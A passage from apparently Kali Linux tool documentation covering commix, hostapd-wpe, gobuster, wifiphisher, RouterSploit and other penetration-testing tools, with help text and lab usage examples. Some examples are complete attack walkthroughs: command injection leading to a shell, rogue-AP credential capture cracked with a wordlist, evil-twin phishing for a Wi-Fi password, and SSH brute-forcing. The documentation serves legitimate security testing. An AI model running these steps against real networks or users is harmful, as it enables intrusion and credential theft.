    --host=HOST         HTTP Host header.
    --referer=REFERER   HTTP Referer header.
    --user-agent=AGENT  HTTP User-Agent header.
    --random-agent      Use a randomly selected HTTP User-Agent header.
    --param-del=PDEL    Set character for splitting parameter values.
    --cookie=COOKIE     HTTP Cookie header.
    --cookie-del=CDEL   Set character for splitting cookie values.
    --headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
    --proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
    --tor               Use the Tor network.
    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).
    --auth-url=AUTH_..  Login panel URL.
    --auth-data=AUTH..  Login parameters and data.
    --auth-type=AUTH..  HTTP authentication type (e.g. 'basic').
    --auth-cred=AUTH..  HTTP Authentication credentials (e.g. 'admin:admin').

  Enumeration:
    These options can be used to enumerate the target host.

    --current-user      Retrieve current user name.
    --hostname          Retrieve current hostname.
    --is-root           Check if the current user have root privileges.
    --is-admin          Check if the current user have admin privileges.
    --sys-info          Retrieve system information.
    --users             Retrieve system users.
    --passwords         Retrieve system users password hashes.
    --privileges        Retrieve system users privileges.

  File access:
    These options can be used to access files on the target host.

    --file-read=FILE..  Read a file from the target host.
    --file-write=FIL..  Write to a file on the target host.
    --file-upload=FI..  Upload a file on the target host.
    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.

  Modules:
    These options can be used increase the detection and/or injection
    capabilities.

    --icmp-exfil=IP_..  The 'icmp exfiltration' injection technique
                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').
    --shellshock        The 'shellshock' injection technique.

  Injection:
    These options can be used to specify which parameters to inject and to
    provide custom injection payloads.

    --data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                        the testable parameter).
    --suffix=SUFFIX     Injection payload suffix string.
    --prefix=PREFIX     Injection payload prefix string.
    --technique=TECH    Specify injection technique(s) to use.
    --maxlen=MAXLEN     The length of the output on time-based technique
                        (Default: 10000 chars).
    --delay=DELAY       Set Time-delay for time-based and file-based
                        techniques (Default: 1 sec).
    --tmp-path=TMP_P..  Set remote absolute path of temporary files directory
                        (Default: ).
    --root-dir=SRV_R..  Set remote absolute path of web server's root
                        directory (Default: ).
    --alter-shell=AL..  Use an alternative os-shell (e.g. Python).
    --os-cmd=OS_CMD     Execute a single operating system command.
    --base64            Encode the operating system command to Base64 format.


root@kali:~#

Commix Usage Example

root@kali:~# commix --url http://192.168.20.12/dvwa/vulnerabilities/exec/ \
>   --cookie='PHPSESSID=cj645co26lgve7ro1kc9dvt3a0; security=low' \
>   --data='ip=INJECT_HERE&Submit=Submit'
                                       __          
   ___    ___     ___ ___     ___ ___ /\_\   __  _  
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </  
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.3b-nongit-20160104 }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2014-2015 Anastasios Stasinopoulos (@ancst)
+--

(*) Checking connection to the target URL... [ SUCCEED ]
(^) Warning: Heuristics have failed to identify server's operating system.
(?) Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > w
(*) Setting the (POST) 'ip' parameter for tests.
(^) Warning: Due to the relatively slow response of 'cmd.exe' there may be delays during the data extraction procedure.
(*) Testing the classic injection technique... [ SUCCEED ]
(!) The (POST) 'ip' parameter is vulnerable to Results-based Command Injection.
  (+) Type : Results-based Command Injection
  (+) Technique : Classic Injection Technique
  (+) Payload : %26 for /f "delims=" %i in ('cmd /c "set /a (49+1)"') do @set /p = AWMZVA%iAWMZVAAWMZVA <nul

(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > y

Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami

nt authority\iusr

commix(os_shell) >

hostapd-wpe

November 12, 2016, 12:14 pm

≫ Next: Gobuster

≪ Previous: Commix

$

0

0

hostapd-wpe Package Description

hostapd-wpe is the replacement for FreeRADIUS-WPE.

It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.

hostapd-wpe supports the following EAP types for impersonation:
1. EAP-FAST/MSCHAPv2 (Phase 0)
2. PEAP/MSCHAPv2
3. EAP-TTLS/MSCHAPv2
4. EAP-TTLS/MSCHAP
5. EAP-TTLS/CHAP
6. EAP-TTLS/PAP

Once impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator.

For 802.11 clients, hostapd-wpe also implements Karma-style gratuitous probe responses. Inspiration for this was provided by JoMo-Kun’s patch for older versions of hostapd.

Patch Source: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe
hostapd Homepage | Kali hostapd-wpe Repo | Kali hostapd-wpe Package

• Patch Author: Thomas d’Otreppe
• License: BSD license

hostapd-wpe usage

hostapd-wpe – Modified hostapd to facilitate AP impersonation attacks

Update your Kali installation, install hostapd-wpe if not already present.

root@kali:~# apt update
root@kali:~# apt install hostapd-wpe

Once installed, configure AP properties by editing /etc/hostapd-wpe/hostapd-wpe.conf

root@kali:~# nano /etc/hostapd-wpe/hostapd-wpe.conf

Kill network-manager using airmon-ng

root@kali:~# airmon-ng check kill

Start hostapd-wpe. A wireless AP will appear. Passwords of users connecting and authenticating to this network will be printed to the console.

root@kali:~# hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Configuration file: /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0 with hwaddr c4:e9:84:17:ff:c8 and ssid "hostapd-wpe"
wlan0: interface state UNINITIALIZED>ENABLED
wlan0: AP-ENABLED
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: authenticated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED ac:fd:ec:78:72:bd
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267

wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: disassociated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: deauthenticated due to local deauth request
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
root@kali:~#

Once a challenge and responce are obtained, crack them using asleap, together with a password dictionary file.

root@kali:~# zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e:0e:9d:0b:5a:3f:f5:23 -R 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67 -W -
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using STDIN for words.
hash bytes: 586c
NT hash: 8846f7eaee8fb117ad06bdd830b7586c
password: password

Gobuster

February 6, 2017, 1:41 pm

≫ Next: nbtscan-unixwiz

≪ Previous: hostapd-wpe

$

0

0

Gobuster Package Description

Gobuster is a tool used to brute-force:

• URIs (directories and files) in web sites.
• DNS subdomains (with wildcard support).

Because I wanted:

1. something that didn’t have a fat Java GUI (console FTW).
2. to build something that just worked on the command line.
3. something that did not do recursive brute force.
4. something that allowed me to brute force folders and multiple extensions at once.
5. something that compiled to native on multiple platforms.
6. something that was faster than an interpreted script (such as Python).
7. something that didn’t require a runtime.
8. use something that was good with concurrency (hence Go).
9. to build something in Go that wasn’t totally useless.

Source: https://github.com/OJ/gobuster
Gobuster Homepage | Kali gobuster Repo

• Author: OJ Reeves
• License: Apache-2.0

Tools included in the gobuster package

gobuster – Directory/file and DNS busting tool written in Go

root@kali:~# gobuster -h
Usage of gobuster:
  -P string
        Password for Basic Auth (dir mode only)
  -U string
        Username for Basic Auth (dir mode only)
  -a string
        Set the User-Agent string (dir mode only)
  -c string
        Cookies to use for the requests (dir mode only)
  -e    Expanded mode, print full URLs
  -f    Append a forward-slash to each directory request (dir mode only)
  -fw
        Force continued operation when wildcard found (dns mode only)
  -i    Show IP addresses (dns mode only)
  -l    Include the length of the body in the output (dir mode only)
  -m string
        Directory/File mode (dir) or DNS mode (dns) (default "dir")
  -n    Don't print status codes
  -p string
        Proxy to use for requests [http(s)://host:port] (dir mode only)
  -q    Don't print the banner and other noise
  -r    Follow redirects
  -s string
        Positive status codes (dir mode only) (default "200,204,301,302,307")
  -t int
        Number of concurrent threads (default 10)
  -u string
        The target URL or Domain
  -v    Verbose output (errors)
  -w string
        Path to the wordlist
  -x string
        File extension(s) to search for (dir mode only)

gobuster Usage Examples

Scan a website (-u http://192.168.0.155/) for directories using a wordlist (-w /usr/share/wordlists/dirb/common.txt) and print the full URLs of discovered paths (-e):

root@kali:~# gobuster -e -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/common.txt

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.0.155/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 301,302,307,200,204
[+] Expanded     : true
=====================================================
http://192.168.0.155/blog (Status: 301)
http://192.168.0.155/index.html (Status: 200)
http://192.168.0.155/index (Status: 200)
http://192.168.0.155/photo (Status: 301)
http://192.168.0.155/wordpress (Status: 301)
=====================================================

nbtscan-unixwiz

February 22, 2017, 10:22 am

≫ Next: wifiphisher

≪ Previous: Gobuster

$

0

0

nbtscan-unixwiz Package Description

This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one.

Source: http://unixwiz.net/tools/nbtscan.html
nbtscan-unixwiz Homepage | Kali nbtscan-unixwiz Repo

• Author: Steve Friedl
• License: public-domain

Tools included in the nbtscan-unixwiz package

nbtscan-unixwiz – Scanner for open NETBIOS nameservers

root@kali:~# nbtscan-unixwiz
nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/

usage: nbtscan-unixwiz [options] target [targets...]

   Targets are lists of IP addresses, DNS names, or address
   ranges. Ranges can be in /nbits notation ("192.168.12.0/24")
   or with a range in the last octet ("192.168.12.64-97")

   -V        show Version information
   -f        show Full NBT resource record responses (recommended)
   -H        generate HTTP headers
   -v        turn on more Verbose debugging
   -n        No looking up inverse names of IP addresses responding
   -p <n>    bind to UDP Port <n> (default=0)
   -m        include MAC address in response (implied by '-f')
   -T <n>    Timeout the no-responses in <n> seconds (default=2 secs)
   -w <n>    Wait <n> msecs after each write (default=10 ms)
   -t <n>    Try each address <n> tries (default=1)
   -P        generate results in perl hashref format

nbtscan-unixwiz Usage Examples

Scan a range of IP addresses (192.168.0.100-110) without doing inverse name lookups (-n):

root@kali:~# nbtscan-unixwiz -n 192.168.0.100-110
192.168.0.105   WORKGROUP\RETROPIE              SHARING
*timeout (normal end of scan)

Scan a single IP address (192.168.0.38) and show Full NBT resource record responses (-f):

root@kali:~# nbtscan-unixwiz -f 192.168.0.38
192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING
  DOOKOSSEL      <00> UNIQUE Workstation Service
  DOOKOSSEL      <03> UNIQUE Messenger Service<3>
  DOOKOSSEL      <20> UNIQUE File Server Service
  ..__MSBROWSE__.<01> GROUP  Master Browser
  WORKGROUP      <00> GROUP  Domain Name
  WORKGROUP      <1d> UNIQUE Master Browser
  WORKGROUP      <1e> GROUP  Browser Service Elections
  00:00:00:00:00:00   ETHER

---

wifiphisher

February 22, 2017, 1:46 pm

≫ Next: Faraday

≪ Previous: nbtscan-unixwiz

$

0

0

wifiphisher Package Description

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing.
After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim’s perspective, the attack takes place in three phases:

1. Victim is deauthenticated from their access point.
2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
3. Victim is served a realistic specially-customized phishing page.

Source: https://wifiphisher.org/docs.html
wifiphisher Homepage | Kali wifiphisher Repo

• Author: sophron
• License: GPLv3

Tools included in the wifiphisher package

wifiphisher – Automated phishing attacks against Wi-Fi networks

root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

wifiphisher Usage Examples

Do not perform jamming (-nJ), create a wireless access point (-e “Free Wi-Fi”) and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they a presented with a webpage to enter the PSK of their network:

root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:



DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3


HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93

Faraday

March 7, 2017, 2:03 pm

≫ Next: ident-user-enum

≪ Previous: wifiphisher

$

0

0

python-faraday Package Description

Faraday introduces a new concept – IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the data generated during a security audit.

The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Source: https://github.com/infobyte/faraday
Faraday Homepage | Kali python-faraday Repo | Kali python-faraday Package

• Author: Infobyte LLC
• License: GPLv3

Tools included in the python-faraday package

python-faraday – Collaborative Penetration Test IDE

root@kali:~# python-faraday -h
usage: faraday.py [-h] [-n HOST] [-px PORT_XMLRPC] [-pr PORT_REST] [-d]
                  [--profile] [--profile-output PROFILE_OUTPUT]
                  [--profile-depth PROFILE_DEPTH] [--disable-excepthook]
                  [--dev-mode] [--ignore-deps] [--update] [--cert CERT_PATH]
                  [--gui GUI] [--cli] [-w WORKSPACE] [-r FILENAME]

Faraday's launcher parser.

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           Enables debug mode. Default = disabled
  --disable-excepthook  Disable the application exception hook that allows to
                        send error reports to developers.
  --dev-mode            Enable dev mode. This will use the user config and
                        plugin folder.
  --ignore-deps         Ignore python dependencies resolution.
  --update              Update Faraday IDE.
  --cert CERT_PATH      Path to the valid CouchDB certificate
  --gui GUI             Select interface to start faraday. Supported values
                        are gtk and 'no' (no GUI at all). Defaults to GTK
  --cli                 Set this flag to avoid gui and use faraday as a cli.
  -w WORKSPACE, --workspace WORKSPACE
                        Workspace to be opened
  -r FILENAME, --report FILENAME
                        Report to be parsed by the cli

connection:
  -n HOST, --hostname HOST
                        The hostname where both server APIs will listen
                        (XMLRPC and RESTful). Default = localhost
  -px PORT_XMLRPC, --port-xmlrpc PORT_XMLRPC
                        Sets the port where the api XMLRPCServer will listen.
                        Default = 9876
  -pr PORT_REST, --port-rest PORT_REST
                        Sets the port where the api RESTful server will
                        listen. Default = 9977

profiling:
  --profile             Enables application profiling. When this option is
                        used --profile-output and --profile-depth can also be
                        used. Default = disabled
  --profile-output PROFILE_OUTPUT
                        Sets the profile output filename. If no value is
                        provided, standard output will be used
  --profile-depth PROFILE_DEPTH
                        Sets the profile number of entries (depth). Default =
                        500

Faraday Usage Examples

Faraday is a GUI application that consists of a ZSH terminal and a sidebar with details about your workspaces and hosts.

When Faraday supports the command you are running, it will automatically detect it and import the results. In the example below, the original nmap command that was entered was nmap -A 192.168.0.7, which Faraday converted on the fly.

>>> WELCOME TO FARADAY
[+] Current Workspace: dev1
[+] API: OK
[faraday](dev1) kali#  nmap -oX /root/.faraday/data/devel1_Nmap_output-3.46164772371.xml -A 192.168.0.7 2>&1 | tee -a tmp.tu0ldZUG2JgzuHvLOjBYEzBx3Bu7O

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-07 13:46 MST
Nmap scan report for pi-hole (192.168.0.7)
Host is up (0.0011s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 6.7p1 Raspbian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 f7:5d:7c:e2:c5:46:32:19:08:e9:4b:79:5e:80:1c:83 (DSA)
|   2048 3c:f9:1d:ce:03:0f:2e:d2:17:05:77:af:81:54:32:fc (RSA)
|_  256 ea:20:d1:e0:e1:89:2c:65:9e:0d:d0:d0:e9:8b:9b:28 (ECDSA)
53/tcp  open  domain     dnsmasq 2.72
| dns-nsid:
|_  bind.version: dnsmasq-2.72
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Welcome page
110/tcp open  tcpwrapped
143/tcp open  tcpwrapped
Device type: general purpose
Running: Linux 2.4.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:3.2
OS details: DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.27 ms 172.16.206.2
2   0.21 ms pi-hole (192.168.0.7)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds
[faraday](devel1) kali#

Once the nmap scan is finished, double-clicking on the host under the Hosts tab will bring up details about the host, its services, and any vulnerabilities that were detected.

The excellent dirb utility is also supported by Faraday by default:

[faraday](devel1) kali#  dirb http://192.168.0.23/commix-testbed -w 2>&1 | tee -a tmp.qNejUxvvrPpbGPVEfwf8OZOuM1F1E

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Mar  7 13:58:52 2017
URL_BASE: http://192.168.0.23/commix-testbed/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4612                                                              

---- Scanning URL: http://192.168.0.23/commix-testbed/ ----
                                                                                                                                                         ==> DIRECTORY: http://192.168.0.23/commix-testbed/css/                                                                                                                      
==> DIRECTORY: http://192.168.0.23/commix-testbed/fonts/                                                                                                                    
==> DIRECTORY: http://192.168.0.23/commix-testbed/img/                                                                                                                      
+ http://192.168.0.23/commix-testbed/index.php (CODE:200|SIZE:14346)                                                                                                        
==> DIRECTORY: http://192.168.0.23/commix-testbed/js/                                                                                                                        
==> DIRECTORY: http://192.168.0.23/commix-testbed/readme/                                                                                                                    
                                                                                                                                                                             
---- Entering directory: http://192.168.0.23/commix-testbed/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                             
---- Entering directory: http://192.168.0.23/commix-testbed/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                             
---- Entering directory: http://192.168.0.23/commix-testbed/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                             
---- Entering directory: http://192.168.0.23/commix-testbed/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                             
---- Entering directory: http://192.168.0.23/commix-testbed/readme/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                             
-----------------
END_TIME: Tue Mar  7 14:04:24 2017
DOWNLOADED: 27672 - FOUND: 1

When the scan is finished, double-clicking on the host will bring up its details, including the directories that dirb detected.

Take a look in the /usr/share/python-faraday/plugins/repo directory to see what other applications Faraday supports.

root@kali:/usr/share/python-faraday/plugins/repo# ls
acunetix  dnsrecon      listurl       netsparker     retina          wapiti
amap      dnswalk       maltego       nexpose        reverseraider   wcscan
appscan   fierce        masscan       nexpose-full   sentinel        webfuzzer
arachni   fruitywifi    medusa        nikto          skipfish        whois
arp-scan  ftp           metagoofil    nmap           sqlmap          wpscan
beef      goohost       metasploit    openvas        sshdefaultscan  x1
burp      hping3        metasploiton  pasteanalyzer  sslcheck        zap
dig       hydra         ndiff         peepingtom     telnet
dirb      impact        nessus        ping           theharvester
dnsenum   __init__.py   netcat        propecia       traceroute
dnsmap    __init__.pyc  netdiscover   qualysguard    w3af

Faraday also includes a full-featured web interface that provides you, your team, and any other interested parties with an immense amount of information.

ident-user-enum

March 17, 2017, 2:56 pm

≫ Next: SPARTA

≪ Previous: Faraday

$

0

0

ident-user-enum Package Description

ident-user-enum is a simple PERL script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.
This can help to prioritise target service during a pentest (you might want to attack services running as root first). Alternatively, the list of usernames gathered can be used for password guessing attacks on other network services.

Source: http://pentestmonkey.net/tools/user-enumeration/ident-user-enum
ident-user-enum Homepage | Kali ident-user-enum Repo

• Author: pentestmonkey
• License: GPLv2

Tools included in the ident-user-enum package

ident-user-enum – Query ident to determine the owner of a TCP network process

root@kali:~# ident-user-enum
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

Usage: ident-user-enum.pl ip port [ port [ port ... ] ]

Queries the ident service (113/TCP) to determine the OS-level user running
the process listening on a given TCP port.  More than one port can be supplied.

ident-user-enum Usage Examples

Scan the remote host (192.168.1.13) and determine which user is running the service on the specified ports (22 139 445).

root@kali:~# ident-user-enum 192.168.1.13 22 139 445
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )

192.168.1.13:22 root
192.168.1.13:139    root
192.168.1.13:445    root

SPARTA

March 28, 2017, 3:06 pm

≫ Next: RouterSploit

≪ Previous: ident-user-enum

$

0

0

sparta Package Description

SPARTA is a python GUI application that simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to their toolkit and by displaying all tool output in a convenient way. If less time is spent setting up commands and tools, more time can be spent focusing on analysing results.

Source: http://sparta.secforce.com/
SPARTA Homepage | Kali sparta Repo

• Author: SECFORCE (Antonio Quina and Leonidas Stavliotis)
• License: GPLv3

Tools included in the sparta package

sparta – Network Infrastructure Penetration Testing Tool

SPARTA Usage Examples

When SPARTA is first launched, either via the Kali Applications menu or by running sparta at the command line, the main interface will open, presenting you with your workspace. Initially, the hosts pane will be empty so you can either import an Nmap scan results file or, as this example shows, click in the pane on the text “Click here to add host(s) to scope“.

After clicking “Add to scope“, the Nmap scan will begin and we are presented with a progress indicator in the Log pane.

The default Nmap scan is quite thorough and will take some time to complete. Once SPARTA has some hosts and ports to work with, it proceeds to run additional tools against the discovered services such as nikto, smbenum, snmpcheck, and more.

Selecting a host in the Hosts pane will display tabs for each of scans that was run against the host, including screenshots of any web servers that it encounters.

Services that require a login, such as telnet, SSH, HTTP, etc. can be sent to the brute force tool to try to crack the password. We can do this by right-clicking a service and selecting “”Send to Brute“”.

After we configure our settings, we let SPARTA begin attacking the root password over SSH with a pre-defined wordlist.

SPARTA has many more features available than we covered here and it is worth the time to get to know it better. It can save you a great deal of time in a penetration test by automating many tedious tasks.

RouterSploit

May 2, 2017, 2:11 pm

≫ Next: Airbase-ng

≪ Previous: SPARTA

$

0

0

routersploit Package Description

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of various modules that aids penetration testing operations:

• exploits – modules that take advantage of identified vulnerabilities
• creds – modules designed to test credentials against network services
• scanners – modules that check if a target is vulnerable to any exploit

Source: https://github.com/reverse-shell/routersploit
RouterSploit Homepage | Kali routersploit Repo

• Author: Reverse Shell Security
• License: BSD-3-clause

Tools included in the routersploit package

routersploit – The RouterSploit Framework

root@kali:~# routersploit
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Bad Blood
 Version  : 2.0.0

 Total module count: 40

rsf >

RouterSploit Usage Examples

RouterSploit has a number of exploits for different router models and they have the ability to check whether the remote target is vulnerable before sending off an exploit.

rsf > use exploits/multi/misfortune_cookie
rsf (Misfortune Cookie) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target address e.g. http://192.168.1.1


rsf (Misfortune Cookie) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (Misfortune Cookie) > check
[-] Target is not vulnerable
rsf (Misfortune Cookie) >

If stealth is not a requirement, you can attempt to use the autopwn scanner module to see if any vulnerabilities can be found.

rsf > use scanners/autopwn
rsf (AutoPwn) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   port       80                   Target port
   target                          Target IP address e.g. 192.168.1.1


rsf (AutoPwn) > set target 192.168.0.2
[+] {'target': '192.168.0.2'}
rsf (AutoPwn) > run
[*] Running module...
[-] exploits/fortinet/fortigate_os_backdoor is not vulnerable
[-] exploits/belkin/n150_path_traversal is not vulnerable
[-] exploits/belkin/g_n150_password_disclosure is not vulnerable
[-] exploits/belkin/n750_rce is not vulnerable
[-] exploits/belkin/g_plus_info_disclosure is not vulnerable
[-] exploits/asus/infosvr_backdoor_rce is not vulnerable
[-] exploits/asus/rt_n16_password_disclosure is not vulnerable
[-] exploits/2wire/gateway_auth_bypass is not vulnerable
[-] exploits/technicolor/tc7200_password_disclosure is not vulnerable
[-] exploits/netgear/multi_rce is not vulnerable
[-] exploits/netgear/n300_auth_bypass is not vulnerable
[-] exploits/netgear/prosafe_rce is not vulnerable
[-] exploits/asmax/ar_1004g_password_disclosure is not vulnerable
[-] exploits/asmax/ar_804_gu_rce is not vulnerable
[-] exploits/linksys/wap54gv3_rce is not vulnerable
[-] exploits/linksys/1500_2500_rce is not vulnerable
[-] exploits/multi/misfortune_cookie is not vulnerable
[-] exploits/cisco/ucs_manager_rce is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dwr_932_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dvg_n5402sp_path_traversal is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[-] exploits/juniper/screenos_backdoor is not vulnerable
[-] exploits/comtrend/ct_5361t_password_disclosure is not vulnerable
[-] Device is not vulnerable to any exploits!

